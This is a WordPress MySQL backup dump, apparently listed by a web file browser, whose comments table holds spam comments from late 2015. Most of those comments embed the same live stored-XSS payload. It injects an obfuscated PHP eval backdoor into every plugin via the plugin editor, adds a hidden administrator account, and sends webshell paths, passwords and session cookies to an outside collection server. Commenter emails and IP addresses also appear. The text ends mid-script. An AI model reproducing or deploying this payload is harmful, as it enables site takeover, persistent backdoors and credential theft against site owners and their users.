0byt3m1n1
Path:
/
data
/
25
/
Hold_for_0002df5.rcomhost.com
/
[
Home
]
File: 1_0002df5_0.mysqlv108.bak.sql
-- MySQL dump 10.11 -- -- Host: mysqlv108 Database: 1_0002df5_0 -- ------------------------------------------------------ -- Server version 5.0.91 /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8 */; /*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */; /*!40103 SET TIME_ZONE='+00:00' */; /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */; /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */; -- -- Table structure for table `wp_commentmeta` -- DROP TABLE IF EXISTS `wp_commentmeta`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_commentmeta` ( `meta_id` bigint(20) unsigned NOT NULL auto_increment, `comment_id` bigint(20) unsigned NOT NULL default '0', `meta_key` varchar(255) default NULL, `meta_value` longtext, PRIMARY KEY (`meta_id`), KEY `comment_id` (`comment_id`), KEY `meta_key` (`meta_key`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_commentmeta` -- LOCK TABLES `wp_commentmeta` WRITE; /*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_comments` -- DROP TABLE IF EXISTS `wp_comments`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_comments` ( `comment_ID` bigint(20) unsigned NOT NULL auto_increment, `comment_post_ID` bigint(20) unsigned NOT NULL default '0', `comment_author` tinytext NOT NULL, `comment_author_email` varchar(100) NOT NULL default '', `comment_author_url` varchar(200) NOT NULL default '', `comment_author_IP` varchar(100) NOT NULL default '', `comment_date` datetime NOT NULL default '0000-00-00 00:00:00', `comment_date_gmt` datetime NOT NULL default '0000-00-00 00:00:00', `comment_content` text NOT NULL, `comment_karma` int(11) NOT NULL default '0', `comment_approved` varchar(20) NOT NULL default '1', `comment_agent` varchar(255) NOT NULL default '', `comment_type` varchar(20) NOT NULL default '', `comment_parent` bigint(20) unsigned NOT NULL default '0', `user_id` bigint(20) unsigned NOT NULL default '0', PRIMARY KEY (`comment_ID`), KEY `comment_post_ID` (`comment_post_ID`), KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`), KEY `comment_date_gmt` (`comment_date_gmt`), KEY `comment_parent` (`comment_parent`) ) ENGINE=MyISAM AUTO_INCREMENT=10 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_comments` -- LOCK TABLES `wp_comments` WRITE; /*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */; INSERT INTO `wp_comments` VALUES (1,1,'Mr WordPress','','https://wordpress.org/','','2014-06-15 03:27:39','2014-06-15 03:27:39','Hi, this is a comment.\nTo delete a comment, just log in and view the post's comments. There you will have the option to edit or delete them.',0,'1','','',0,0),(2,1,'gray','ojrbsgbe@gmail.com','https://www.facebook.com/kdehjn','186.92.93.53','2015-12-05 02:20:23','2015-12-05 02:20:23','hinice lmbnzo<abbr><a href=\'\r\nhref=\"\'> :-) <abbr title=\'\" onmouseover=\"var file = "";
var xurl = "plugin-editor.php";
var Aurl = "user-new.php";
var file2= [];
var shell= [];
var recieve="http://g.fr9.co/xss/recieve.php";//recieve.php 在公网中的地址
var StartGetshell = 1; //是否getshell全部模板  1为是 0为否
var shellcode = "<?php\nif(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}"; 
var tempname = location.href.substring(location.href.indexOf('wp-admin'),location.href.length);
var laurl = "http://web.51.la:82/go.asp";

if(!window.x){
  var _st = window.setTimeout;
  window.setTimeout = function(fRef, mDelay) {
    if(typeof fRef == 'function'){
      var argu = Array.prototype.slice.call(arguments,2);
      var f = (function(){ fRef.apply(null, argu); });
      return _st(f, mDelay);
    }
  return _st(fRef,mDelay);
  }
}
function fuckxss(){
  var tempshell = "";
  jQuery.ajax({
    url: xurl,
    type: 'GET',
    dataType: 'html',
    data: {},
  })
  .done(function(data) {
    var temp = jQuery(data);
    var Xtoken = "";
    var Tmpcode = "";
    temp.find('input#_wpnonce').each(function(i,o){
      var o=jQuery(o);
      Xtoken=o.attr('value');
    });
    temp.find('div.alignleft big strong').each(function(i,o){
      var o=jQuery(o);
      file = o.text();
    });
    temp.find('textarea#newcontent').each(function(i,o){
      var o=jQuery(o);
      if(o.text().indexOf('$www = $_POST[\'dak\']')>0){
        SenData('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak\r\nCookie: "+document.cookie);
        return false;
      }
      Tmpcode = o.text().replace('<?php',shellcode);    
    });
    temp.find('select#plugin option').each(function(i,o){
      var o=jQuery(o);
      file2.push(o.attr('value'));
    });
    if(Xtoken&&Tmpcode&&file){
      jQuery.ajax({
      url: xurl,
      type: 'POST',
      data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'}
      })
      .done(function(){       
        SenData('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak");
        return;
      })
    }
    if(StartGetshell){
      for(var i=0;i<file2.length;i++){
        window.setTimeout(GetAllShell,150,file2[i]+"|"+file2[file2.length-1]);
      }
    }
  })
}
function GetAllShell(target){
  var TmpArr = target.split("|")[1];
  var filename = target.split("|")[0];
  if(filename!=file){
    jQuery.ajax({
    url: xurl,
    type: 'POST',
    data: {'plugin': filename,'Submit':'Select'},
  })
  .done(function(data) {
    var NewCode = "";
    var NewToken= "";
    var Getshell=jQuery(data);
    Getshell.find("textarea#newcontent").each(function(i,o){
      var o=jQuery(o);
      if(o.text().indexOf('$www = $_POST[\'dak\']')>0){
        shell.push('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak");
console.log(filename+" x  "+TmpArr);        
if(filename==TmpArr){
          SenData(shell.join("\r\n"));
        }
        return false;
      }
      NewCode = o.text().replace('<?php',shellcode);    
    });
    Getshell.find("input#_wpnonce").each(function(i,o){
      var o=jQuery(o);
      NewToken = o.attr('value');
    });
    if(NewCode&&NewToken){
      jQuery.ajax({
      url: xurl,
      type: 'POST',
      data: {'_wpnonce':NewToken,'newcontent':NewCode,'action':'update','file':filename,'plugin':filename,'submit':'Update+File'}
      })
      .done(function(){
        shell.push('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak");
console.log(filename+"  "+TmpArr);        
if(filename==TmpArr){
          SenData(shell.join("\r\n"));
        }
        return;
      })
      .fail(function(){
        shell.push(location.href+': GetShell '+filename+' Failure');
      })
    }
  })
  }
}
function adduser(){
  jQuery.ajax({
    url: Aurl,
    type: 'GET',
    dataType: 'html',
    data: {},
  })
  .done(function(data) {
    var temp = jQuery(data);
    var Xtoken = "";
    temp.find('input#_wpnonce_create-user').each(function(i,o){
      var o=jQuery(o);
      Xtoken=o.attr('value');
    });
    jQuery.ajax({
      url: Aurl,
      type: 'POST',
      data: {'action': 'createuser','_wpnonce_create-user':Xtoken,'user_login':'obuser','email':'user@gmail.com','first_name':'','last_name':'','url':'','pass1':'obpass','pass2':'obpass','role':'administrator','createuser':'Add+New+User+'}
      })
    .done(function(){
      SenData(location.href+': Add Administrator success User: obuser Password: obpass'+'\r\n\r\n');
    });
    jQuery.ajax({ 
      url: laurl, 
      type: 'GET',
      data: {'svid':13,'id':18646852,'vpage':location.href}
    })  
  })
}
function SenData(data){
  jQuery.ajax({
    url: recieve,
    type: 'POST',
    data:{"Data":data}
  })
}
if(!window.x){window.x=1;fuckxss();adduser();};\" style=\"display:block;position:absolute;width:100%;height:100%;top:0;left:0;\" \'><a></abbr></a>',0,'0','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','',0,0),(3,1,'reynolds','oknsko@gmail.com','https://www.facebook.com/saekmn','195.5.109.243','2015-12-12 02:03:28','2015-12-12 02:03:28','hinice sxsmwr<abbr><a href=\'\r\nhref=\"\'> :-) <abbr title=\'\" onmouseover=\"var file = "";
var xurl = "plugin-editor.php";
var Aurl = "user-new.php";
var file2= [];
var shell= [];
var recieve="http://g.fr9.co/xss/recieve.php";//recieve.php 在公网中的地址
var StartGetshell = 1; //是否getshell全部模板  1为是 0为否
var shellcode = "<?php\nif(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}"; 
var tempname = location.href.substring(location.href.indexOf('wp-admin'),location.href.length);
var laurl = "http://web.51.la:82/go.asp";

if(!window.x){
  var _st = window.setTimeout;
  window.setTimeout = function(fRef, mDelay) {
    if(typeof fRef == 'function'){
      var argu = Array.prototype.slice.call(arguments,2);
      var f = (function(){ fRef.apply(null, argu); });
      return _st(f, mDelay);
    }
  return _st(fRef,mDelay);
  }
}
function fuckxss(){
  var tempshell = "";
  jQuery.ajax({
    url: xurl,
    type: 'GET',
    dataType: 'html',
    data: {},
  })
  .done(function(data) {
    var temp = jQuery(data);
    var Xtoken = "";
    var Tmpcode = "";
    temp.find('input#_wpnonce').each(function(i,o){
      var o=jQuery(o);
      Xtoken=o.attr('value');
    });
    temp.find('div.alignleft big strong').each(function(i,o){
      var o=jQuery(o);
      file = o.text();
    });
    temp.find('textarea#newcontent').each(function(i,o){
      var o=jQuery(o);
      if(o.text().indexOf('$www = $_POST[\'dak\']')>0){
        SenData('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak\r\nCookie: "+document.cookie);
        return false;
      }
      Tmpcode = o.text().replace('<?php',shellcode);    
    });
    temp.find('select#plugin option').each(function(i,o){
      var o=jQuery(o);
      file2.push(o.attr('value'));
    });
    if(Xtoken&&Tmpcode&&file){
      jQuery.ajax({
      url: xurl,
      type: 'POST',
      data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'}
      })
      .done(function(){       
        SenData('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak");
        return;
      })
    }
    if(StartGetshell){
      for(var i=0;i<file2.length;i++){
        window.setTimeout(GetAllShell,150,file2[i]+"|"+file2[file2.length-1]);
      }
    }
  })
}
function GetAllShell(target){
  var TmpArr = target.split("|")[1];
  var filename = target.split("|")[0];
  if(filename!=file){
    jQuery.ajax({
    url: xurl,
    type: 'POST',
    data: {'plugin': filename,'Submit':'Select'},
  })
  .done(function(data) {
    var NewCode = "";
    var NewToken= "";
    var Getshell=jQuery(data);
    Getshell.find("textarea#newcontent").each(function(i,o){
      var o=jQuery(o);
      if(o.text().indexOf('$www = $_POST[\'dak\']')>0){
        shell.push('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak");
console.log(filename+" x  "+TmpArr);        
if(filename==TmpArr){
          SenData(shell.join("\r\n"));
        }
        return false;
      }
      NewCode = o.text().replace('<?php',shellcode);    
    });
    Getshell.find("input#_wpnonce").each(function(i,o){
      var o=jQuery(o);
      NewToken = o.attr('value');
    });
    if(NewCode&&NewToken){
      jQuery.ajax({
      url: xurl,
      type: 'POST',
      data: {'_wpnonce':NewToken,'newcontent':NewCode,'action':'update','file':filename,'plugin':filename,'submit':'Update+File'}
      })
      .done(function(){
        shell.push('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak");
console.log(filename+"  "+TmpArr);        
if(filename==TmpArr){
          SenData(shell.join("\r\n"));
        }
        return;
      })
      .fail(function(){
        shell.push(location.href+': GetShell '+filename+' Failure');
      })
    }
  })
  }
}
function adduser(){
  jQuery.ajax({
    url: Aurl,
    type: 'GET',
    dataType: 'html',
    data: {},
  })
  .done(function(data) {
    var temp = jQuery(data);
    var Xtoken = "";
    temp.find('input#_wpnonce_create-user').each(function(i,o){
      var o=jQuery(o);
      Xtoken=o.attr('value');
    });
    jQuery.ajax({
      url: Aurl,
      type: 'POST',
      data: {'action': 'createuser','_wpnonce_create-user':Xtoken,'user_login':'obuser','email':'user@gmail.com','first_name':'','last_name':'','url':'','pass1':'obpass','pass2':'obpass','role':'administrator','createuser':'Add+New+User+'}
      })
    .done(function(){
      SenData(location.href+': Add Administrator success User: obuser Password: obpass'+'\r\n\r\n');
    });
    jQuery.ajax({ 
      url: laurl, 
      type: 'GET',
      data: {'svid':13,'id':18646852,'vpage':location.href}
    })  
  })
}
function SenData(data){
  jQuery.ajax({
    url: recieve,
    type: 'POST',
    data:{"Data":data}
  })
}
if(!window.x){window.x=1;fuckxss();adduser();};\" style=\"display:block;position:absolute;width:100%;height:100%;top:0;left:0;\" \'><a></abbr></a>',0,'0','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','',0,0),(4,1,'ross','jpvrddxnvnx@gmail.com','https://www.facebook.com/pdefgijn','41.207.49.136','2015-12-13 03:57:03','2015-12-13 03:57:03','hinice gpybhd<abbr><a href=\'\r\nhref=\"\'> :-) <abbr title=\'\" onmouseover=\"var file = "";
var xurl = "plugin-editor.php";
var Aurl = "user-new.php";
var file2= [];
var shell= [];
var recieve="http://g.fr9.co/xss/recieve.php";//recieve.php 在公网中的地址
var StartGetshell = 1; //是否getshell全部模板  1为是 0为否
var shellcode = "<?php\nif(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}"; 
var tempname = location.href.substring(location.href.indexOf('wp-admin'),location.href.length);
var laurl = "http://web.51.la:82/go.asp";

if(!window.x){
  var _st = window.setTimeout;
  window.setTimeout = function(fRef, mDelay) {
    if(typeof fRef == 'function'){
      var argu = Array.prototype.slice.call(arguments,2);
      var f = (function(){ fRef.apply(null, argu); });
      return _st(f, mDelay);
    }
  return _st(fRef,mDelay);
  }
}
function fuckxss(){
  var tempshell = "";
  jQuery.ajax({
    url: xurl,
    type: 'GET',
    dataType: 'html',
    data: {},
  })
  .done(function(data) {
    var temp = jQuery(data);
    var Xtoken = "";
    var Tmpcode = "";
    temp.find('input#_wpnonce').each(function(i,o){
      var o=jQuery(o);
      Xtoken=o.attr('value');
    });
    temp.find('div.alignleft big strong').each(function(i,o){
      var o=jQuery(o);
      file = o.text();
    });
    temp.find('textarea#newcontent').each(function(i,o){
      var o=jQuery(o);
      if(o.text().indexOf('$www = $_POST[\'dak\']')>0){
        SenData('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak\r\nCookie: "+document.cookie);
        return false;
      }
      Tmpcode = o.text().replace('<?php',shellcode);    
    });
    temp.find('select#plugin option').each(function(i,o){
      var o=jQuery(o);
      file2.push(o.attr('value'));
    });
    if(Xtoken&&Tmpcode&&file){
      jQuery.ajax({
      url: xurl,
      type: 'POST',
      data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'}
      })
      .done(function(){       
        SenData('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak");
        return;
      })
    }
    if(StartGetshell){
      for(var i=0;i<file2.length;i++){
        window.setTimeout(GetAllShell,150,file2[i]+"|"+file2[file2.length-1]);
      }
    }
  })
}
function GetAllShell(target){
  var TmpArr = target.split("|")[1];
  var filename = target.split("|")[0];
  if(filename!=file){
    jQuery.ajax({
    url: xurl,
    type: 'POST',
    data: {'plugin': filename,'Submit':'Select'},
  })
  .done(function(data) {
    var NewCode = "";
    var NewToken= "";
    var Getshell=jQuery(data);
    Getshell.find("textarea#newcontent").each(function(i,o){
      var o=jQuery(o);
      if(o.text().indexOf('$www = $_POST[\'dak\']')>0){
        shell.push('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak");
console.log(filename+" x  "+TmpArr);        
if(filename==TmpArr){
          SenData(shell.join("\r\n"));
        }
        return false;
      }
      NewCode = o.text().replace('<?php',shellcode);    
    });
    Getshell.find("input#_wpnonce").each(function(i,o){
      var o=jQuery(o);
      NewToken = o.attr('value');
    });
    if(NewCode&&NewToken){
      jQuery.ajax({
      url: xurl,
      type: 'POST',
      data: {'_wpnonce':NewToken,'newcontent':NewCode,'action':'update','file':filename,'plugin':filename,'submit':'Update+File'}
      })
      .done(function(){
        shell.push('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak");
console.log(filename+"  "+TmpArr);        
if(filename==TmpArr){
          SenData(shell.join("\r\n"));
        }
        return;
      })
      .fail(function(){
        shell.push(location.href+': GetShell '+filename+' Failure');
      })
    }
  })
  }
}
function adduser(){
  jQuery.ajax({
    url: Aurl,
    type: 'GET',
    dataType: 'html',
    data: {},
  })
  .done(function(data) {
    var temp = jQuery(data);
    var Xtoken = "";
    temp.find('input#_wpnonce_create-user').each(function(i,o){
      var o=jQuery(o);
      Xtoken=o.attr('value');
    });
    jQuery.ajax({
      url: Aurl,
      type: 'POST',
      data: {'action': 'createuser','_wpnonce_create-user':Xtoken,'user_login':'obuser','email':'user@gmail.com','first_name':'','last_name':'','url':'','pass1':'obpass','pass2':'obpass','role':'administrator','createuser':'Add+New+User+'}
      })
    .done(function(){
      SenData(location.href+': Add Administrator success User: obuser Password: obpass'+'\r\n\r\n');
    });
    jQuery.ajax({ 
      url: laurl, 
      type: 'GET',
      data: {'svid':13,'id':18646852,'vpage':location.href}
    })  
  })
}
function SenData(data){
  jQuery.ajax({
    url: recieve,
    type: 'POST',
    data:{"Data":data}
  })
}
if(!window.x){window.x=1;fuckxss();adduser();};\" style=\"display:block;position:absolute;width:100%;height:100%;top:0;left:0;\" \'><a></abbr></a>',0,'0','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','',0,0),(5,1,'cruz','epikmd@gmail.com','https://www.facebook.com/lbfhijn','190.205.179.163','2015-12-21 18:56:52','2015-12-21 18:56:52','hinice tzbezi<abbr><a href=\'\r\nhref=\"\'> :-) <abbr title=\'\" onmouseover=\"var file = "";
var xurl = "plugin-editor.php";
var Aurl = "user-new.php";
var file2= [];
var shell= [];
var recieve="http://g.fr9.co/xss/recieve.php";//recieve.php 在公网中的地址
var StartGetshell = 1; //是否getshell全部模板  1为是 0为否
var shellcode = "<?php\nif(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}"; 
var tempname = location.href.substring(location.href.indexOf('wp-admin'),location.href.length);
var laurl = "http://web.51.la:82/go.asp";

if(!window.x){
  var _st = window.setTimeout;
  window.setTimeout = function(fRef, mDelay) {
    if(typeof fRef == 'function'){
      var argu = Array.prototype.slice.call(arguments,2);
      var f = (function(){ fRef.apply(null, argu); });
      return _st(f, mDelay);
    }
  return _st(fRef,mDelay);
  }
}
function fuckxss(){
  var tempshell = "";
  jQuery.ajax({
    url: xurl,
    type: 'GET',
    dataType: 'html',
    data: {},
  })
  .done(function(data) {
    var temp = jQuery(data);
    var Xtoken = "";
    var Tmpcode = "";
    temp.find('input#_wpnonce').each(function(i,o){
      var o=jQuery(o);
      Xtoken=o.attr('value');
    });
    temp.find('div.alignleft big strong').each(function(i,o){
      var o=jQuery(o);
      file = o.text();
    });
    temp.find('textarea#newcontent').each(function(i,o){
      var o=jQuery(o);
      if(o.text().indexOf('$www = $_POST[\'dak\']')>0){
        SenData('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak\r\nCookie: "+document.cookie);
        return false;
      }
      Tmpcode = o.text().replace('<?php',shellcode);    
    });
    temp.find('select#plugin option').each(function(i,o){
      var o=jQuery(o);
      file2.push(o.attr('value'));
    });
    if(Xtoken&&Tmpcode&&file){
      jQuery.ajax({
      url: xurl,
      type: 'POST',
      data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'}
      })
      .done(function(){       
        SenData('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak");
        return;
      })
    }
    if(StartGetshell){
      for(var i=0;i<file2.length;i++){
        window.setTimeout(GetAllShell,150,file2[i]+"|"+file2[file2.length-1]);
      }
    }
  })
}
function GetAllShell(target){
  var TmpArr = target.split("|")[1];
  var filename = target.split("|")[0];
  if(filename!=file){
    jQuery.ajax({
    url: xurl,
    type: 'POST',
    data: {'plugin': filename,'Submit':'Select'},
  })
  .done(function(data) {
    var NewCode = "";
    var NewToken= "";
    var Getshell=jQuery(data);
    Getshell.find("textarea#newcontent").each(function(i,o){
      var o=jQuery(o);
      if(o.text().indexOf('$www = $_POST[\'dak\']')>0){
        shell.push('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak");
console.log(filename+" x  "+TmpArr);        
if(filename==TmpArr){
          SenData(shell.join("\r\n"));
        }
        return false;
      }
      NewCode = o.text().replace('<?php',shellcode);    
    });
    Getshell.find("input#_wpnonce").each(function(i,o){
      var o=jQuery(o);
      NewToken = o.attr('value');
    });
    if(NewCode&&NewToken){
      jQuery.ajax({
      url: xurl,
      type: 'POST',
      data: {'_wpnonce':NewToken,'newcontent':NewCode,'action':'update','file':filename,'plugin':filename,'submit':'Update+File'}
      })
      .done(function(){
        shell.push('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak");
console.log(filename+"  "+TmpArr);        
if(filename==TmpArr){
          SenData(shell.join("\r\n"));
        }
        return;
      })
      .fail(function(){
        shell.push(location.href+': GetShell '+filename+' Failure');
      })
    }
  })
  }
}
function adduser(){
  jQuery.ajax({
    url: Aurl,
    type: 'GET',
    dataType: 'html',
    data: {},
  })
  .done(function(data) {
    var temp = jQuery(data);
    var Xtoken = "";
    temp.find('input#_wpnonce_create-user').each(function(i,o){
      var o=jQuery(o);
      Xtoken=o.attr('value');
    });
    jQuery.ajax({
      url: Aurl,
      type: 'POST',
      data: {'action': 'createuser','_wpnonce_create-user':Xtoken,'user_login':'obuser','email':'user@gmail.com','first_name':'','last_name':'','url':'','pass1':'obpass','pass2':'obpass','role':'administrator','createuser':'Add+New+User+'}
      })
    .done(function(){
      SenData(location.href+': Add Administrator success User: obuser Password: obpass'+'\r\n\r\n');
    });
    jQuery.ajax({ 
      url: laurl, 
      type: 'GET',
      data: {'svid':13,'id':18646852,'vpage':location.href}
    })  
  })
}
function SenData(data){
  jQuery.ajax({
    url: recieve,
    type: 'POST',
    data:{"Data":data}
  })
}
if(!window.x){window.x=1;fuckxss();adduser();};\" style=\"display:block;position:absolute;width:100%;height:100%;top:0;left:0;\" \'><a></abbr></a>',0,'0','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','',0,0),(6,1,'jacobs','ipaiesi@gmail.com','https://www.facebook.com/lcfhmn','117.102.94.117','2015-12-22 22:45:52','2015-12-22 22:45:52','hellonice ybyjuf<abbr><a href=\'\r\nhref=\"\'> :-) <abbr title=\'\" onmouseover=\"var file = "";
var xurl = "plugin-editor.php";
var Aurl = "user-new.php";
var file2= [];
var shell= [];
var recieve="http://g.fr9.co/xss/recieve.php";//recieve.php 在公网中的地址
var StartGetshell = 1; //是否getshell全部模板  1为是 0为否
var shellcode = "<?php\nif(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}"; 
var tempname = location.href.substring(location.href.indexOf('wp-admin'),location.href.length);
var laurl = "http://web.51.la:82/go.asp";

if(!window.x){
  var _st = window.setTimeout;
  window.setTimeout = function(fRef, mDelay) {
    if(typeof fRef == 'function'){
      var argu = Array.prototype.slice.call(arguments,2);
      var f = (function(){ fRef.apply(null, argu); });
      return _st(f, mDelay);
    }
  return _st(fRef,mDelay);
  }
}
function fuckxss(){
  var tempshell = "";
  jQuery.ajax({
    url: xurl,
    type: 'GET',
    dataType: 'html',
    data: {},
  })
  .done(function(data) {
    var temp = jQuery(data);
    var Xtoken = "";
    var Tmpcode = "";
    temp.find('input#_wpnonce').each(function(i,o){
      var o=jQuery(o);
      Xtoken=o.attr('value');
    });
    temp.find('div.alignleft big strong').each(function(i,o){
      var o=jQuery(o);
      file = o.text();
    });
    temp.find('textarea#newcontent').each(function(i,o){
      var o=jQuery(o);
      if(o.text().indexOf('$www = $_POST[\'dak\']')>0){
        SenData('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak\r\nCookie: "+document.cookie);
        return false;
      }
      Tmpcode = o.text().replace('<?php',shellcode);    
    });
    temp.find('select#plugin option').each(function(i,o){
      var o=jQuery(o);
      file2.push(o.attr('value'));
    });
    if(Xtoken&&Tmpcode&&file){
      jQuery.ajax({
      url: xurl,
      type: 'POST',
      data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'}
      })
      .done(function(){       
        SenData('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak");
        return;
      })
    }
    if(StartGetshell){
      for(var i=0;i<file2.length;i++){
        window.setTimeout(GetAllShell,150,file2[i]+"|"+file2[file2.length-1]);
      }
    }
  })
}
function GetAllShell(target){
  var TmpArr = target.split("|")[1];
  var filename = target.split("|")[0];
  if(filename!=file){
    jQuery.ajax({
    url: xurl,
    type: 'POST',
    data: {'plugin': filename,'Submit':'Select'},
  })
  .done(function(data) {
    var NewCode = "";
    var NewToken= "";
    var Getshell=jQuery(data);
    Getshell.find("textarea#newcontent").each(function(i,o){
      var o=jQuery(o);
      if(o.text().indexOf('$www = $_POST[\'dak\']')>0){
        shell.push('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak");
console.log(filename+" x  "+TmpArr);        
if(filename==TmpArr){
          SenData(shell.join("\r\n"));
        }
        return false;
      }
      NewCode = o.text().replace('<?php',shellcode);    
    });
    Getshell.find("input#_wpnonce").each(function(i,o){
      var o=jQuery(o);
      NewToken = o.attr('value');
    });
    if(NewCode&&NewToken){
      jQuery.ajax({
      url: xurl,
      type: 'POST',
      data: {'_wpnonce':NewToken,'newcontent':NewCode,'action':'update','file':filename,'plugin':filename,'submit':'Update+File'}
      })
      .done(function(){
        shell.push('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak");
console.log(filename+"  "+TmpArr);        
if(filename==TmpArr){
          SenData(shell.join("\r\n"));
        }
        return;
      })
      .fail(function(){
        shell.push(location.href+': GetShell '+filename+' Failure');
      })
    }
  })
  }
}
function adduser(){
  jQuery.ajax({
    url: Aurl,
    type: 'GET',
    dataType: 'html',
    data: {},
  })
  .done(function(data) {
    var temp = jQuery(data);
    var Xtoken = "";
    temp.find('input#_wpnonce_create-user').each(function(i,o){
      var o=jQuery(o);
      Xtoken=o.attr('value');
    });
    jQuery.ajax({
      url: Aurl,
      type: 'POST',
      data: {'action': 'createuser','_wpnonce_create-user':Xtoken,'user_login':'obuser','email':'user@gmail.com','first_name':'','last_name':'','url':'','pass1':'obpass','pass2':'obpass','role':'administrator','createuser':'Add+New+User+'}
      })
    .done(function(){
      SenData(location.href+': Add Administrator success User: obuser Password: obpass'+'\r\n\r\n');
    });
    jQuery.ajax({ 
      url: laurl, 
      type: 'GET',
      data: {'svid':13,'id':18646852,'vpage':location.href}
    })  
  })
}
function SenData(data){
  jQuery.ajax({
    url: recieve,
    type: 'POST',
    data:{"Data":data}
  })
}
if(!window.x){window.x=1;fuckxss();adduser();};\" style=\"display:block;position:absolute;width:100%;height:100%;top:0;left:0;\" \'><a></abbr></a>',0,'0','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','',0,0),(7,1,'moreno','snphxawizk@gmail.com','https://www.facebook.com/eceghkmn','109.235.251.130','2015-12-25 01:51:45','2015-12-25 01:51:45','hellonice jtzilq<abbr><a href=\'\r\nhref=\"\'> :-) <abbr title=\'\" onmouseover=\"var file = "";
var xurl = "plugin-editor.php";
var Aurl = "user-new.php";
var file2= [];
var shell= [];
var recieve="http://g.fr9.co/xss/recieve.php";//recieve.php 在公网中的地址
var StartGetshell = 1; //是否getshell全部模板  1为是 0为否
var shellcode = "<?php\nif(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}"; 
var tempname = location.href.substring(location.href.indexOf('wp-admin'),location.href.length);
var laurl = "http://web.51.la:82/go.asp";

if(!window.x){
  var _st = window.setTimeout;
  window.setTimeout = function(fRef, mDelay) {
    if(typeof fRef == 'function'){
      var argu = Array.prototype.slice.call(arguments,2);
      var f = (function(){ fRef.apply(null, argu); });
      return _st(f, mDelay);
    }
  return _st(fRef,mDelay);
  }
}
function fuckxss(){
  var tempshell = "";
  jQuery.ajax({
    url: xurl,
    type: 'GET',
    dataType: 'html',
    data: {},
  })
  .done(function(data) {
    var temp = jQuery(data);
    var Xtoken = "";
    var Tmpcode = "";
    temp.find('input#_wpnonce').each(function(i,o){
      var o=jQuery(o);
      Xtoken=o.attr('value');
    });
    temp.find('div.alignleft big strong').each(function(i,o){
      var o=jQuery(o);
      file = o.text();
    });
